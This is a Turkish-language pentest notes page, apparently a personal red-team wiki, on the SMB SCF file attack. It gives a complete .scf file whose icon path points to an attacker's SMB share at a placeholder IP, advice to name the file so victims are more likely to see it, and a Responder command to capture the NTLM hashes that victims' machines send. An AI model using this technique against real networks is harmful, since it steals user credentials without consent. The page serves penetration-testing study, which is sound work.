Tufan Turhan
  • Introduction
  • Red Teaming
    • Initial Access
      • VoipHopper
      • SMB – SCF File Attacks
      • MITM6
      • LLMNR, NBT-NS, mDNS Zehirlemeleri ve Relay Ataklar
    • Responder - DNS Injection
    • Privilege Escalation
      • PrintNightmare
      • Juicy Potato ile Windows Yetki Yükseltme
      • Token Impersonation with Incognito
    • Active Directory & Kerberos
      • Kerberos
      • Kerberosting
      • AS-REP Roasting
      • Overpass The Hash/Pass The Key (PTK)
      • DCSync Attack
      • DCShadow Attack
      • GETTGT
      • Golden Tickets
      • Silver Tickets
      • PowerView
      • MS14-025 (GPP Abusing)
      • BloodHound
      • Procdump
    • Lateral Movement
      • RDP MiTM-Hijacking
      • Vlan Hopping
      • Pivoting
    • Network Pentest
      • IPv4 Subnet Cheat Sheet
      • DNS Spoofing
      • DHCP Rogue
    • Shell to Meterpreter
    • Turn Off or Bypass AV
    • Useful CMD or Powershell Command
    • Brute Force
    • Windows Dosya İndirme
    • Windows UAC Bypass
    • Insecure Dosya İzni
  • Pentesting
    • Pentesting FTP - 21
    • Pentesting SMTP - 25,465,587
    • Pentesting SMB - 139 & 445
    • Pentesting Telnet - 23
    • Pentesting DNS - 53
    • Pentesting MSRPC -135
    • Pentesting SNMP - 161,162
    • Pentesting LDAP - 389,636
    • Pentesting MSSQL - 1433
    • Pentesting MYSQL - 3306
    • Pentesting RDP - 3389
    • Pentesing WINRM 5985,5986
  • Web Application
    • 2FA/OTP Bypass
    • Captcha Bypass
    • Cache Poisoning
    • Command Injection (OS)
    • CRLF Injection
    • Cross-site WebSocket hijacking (CSWSH) -
    • Cross-site request forgery (CSRF) -
    • Dangling Markup -
    • Path traversal
    • File Upload
    • Formula Injection (CSV Injection)
    • Login Bypass List
    • OAuth -
    • Open Redirect
    • Race Condition -
    • Registration - Password Reset & Takeover Vulnerabilities
    • SQL Injection
    • SSRF
  • Linux Privilege Escalation
    • PHP Wrapper
    • Simple Http
    • Editing /etc/passwd
    • SUID Binaries
    • Sudo Rights
    • Otomatize Araçlar
    • OSCP Not
  • HTB
  • Reverse Shell w/Msfvenom
  • Upgrading Simple Shells to Fully Interactive TTYs
Powered by GitBook
On this page
  1. Red Teaming
  2. Initial Access

SMB – SCF File Attacks

PreviousVoipHopperNextMITM6

Last updated 3 years ago

SMB, her hangi bir zafiyet ve içerisinde hassas bir veri içermese de kimliği doğrulanmamış anonim bir kullanıcı için yazma izni varsa burayı sömürmek mümkün olabiliyor.

Bunun için SCF (Shell Command File) adı verilen dosyalar Windows tarafından kullanılır örneğin masaüstünü göster butonu dosyaları açmak için çift tıklama gibi yerlerde kullanılır.

Kod Şu şekilde olacak:

[Shell]

Command=2

IconFile=\\X.X.X.X\share\test.ico

[Taskbar]

Command=ToggleDesktop

Bu dosyayı .scf olarak kaydetmeliyiz ve dosyanın başına @ eklemeliyiz. @ Eklediğimiz de bu dosya mevcut dosya konumunun en üstüne çıkartır bu da tıklanma olasılığını arttırır.

Bir kullanıcı, \X.X.X.X\share\test.ico paylaşımını açar ve .scf uzantılı dosya otomatik olarak yürütülür, bu da kurban sistemi yanıtlayanın dinlediği X.X.X.X ipsinde ki saldıran sistemde kimlik doğrulaması yapmaya zorlar:

Şimdi Responder'ı çalıştırarak, kurbanın bu dosyayı çalıştırmasını beklemeliyiz.

responder -wrf --lm -v -I eth0